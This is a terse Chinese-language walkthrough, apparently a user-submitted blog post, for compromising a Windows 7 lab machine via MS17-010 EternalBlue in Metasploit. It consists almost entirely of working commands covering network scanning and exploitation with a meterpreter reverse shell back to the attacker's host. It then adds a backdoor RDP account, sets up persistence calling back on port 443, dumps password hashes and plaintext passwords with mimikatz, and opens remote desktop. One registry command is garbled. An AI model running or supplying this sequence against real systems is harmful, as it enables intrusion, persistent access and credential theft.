arp-scan -l //扫描本地IP 分析得到靶机IP地址
nmap -A 192.168.232.131 扫描目标开放端口
发现目标开放445段端口
msfconsole //进入msfconsole
search ms17_010 //查找永恒之蓝攻击模块
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
先利用 永痕之蓝扫描工具探测目标是否有利用漏洞
use 3 //全写完太长了 直接use 3
show options //查看配置
set rhosts //设置目标IP地址
run
发现目标主机存在利用漏洞 直接利用exp进行攻击
返回上一级目录
use 0 // 0 = exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp //设置荷载 成功之后会反向连接到本地
set rhosts // 设置目标地址
set lhost //设置本地地址
run
成功打进去
run post/windows/gather/checkvm //检查是否为虚拟机
getuid //检查权限
sysinfo //查看主机信息
run post/windows/manage/enable_rdp username=123 password=123 //添加一个账 密码为123的用户(默认为administrator)
shell >>>net user //查看用户是否添加
run post/windows/gather/enum_applications //查看安装软件
run post/multi/recon/local_exploit_suggester //获取补丁信息
run persistence -U -i 10 -p 443 -r 192.168.232.128//创建一个端口443 IP地址为 192.168.232.128 通讯刷新时间为10秒 同时添加启动项
background
use exploit/multi/handler //连接后门测试
set payload windows/meterpreter/reverse_tcp //设置payload反向连接
set lhost 192.168.232.128 //设置上线地址
set LPORT 443 //设置上线端口 跟上面监听端口一样
获取W7密码
apt-get install mimikatz //安装mimikatz
load mimikatz //加载模块
msv //获取登录密码的hash值
kerberos //获取明文密码
进入shell
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
rdesktop 192.168.1.128 -u Administrator -p ms17-010! //连接w7
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!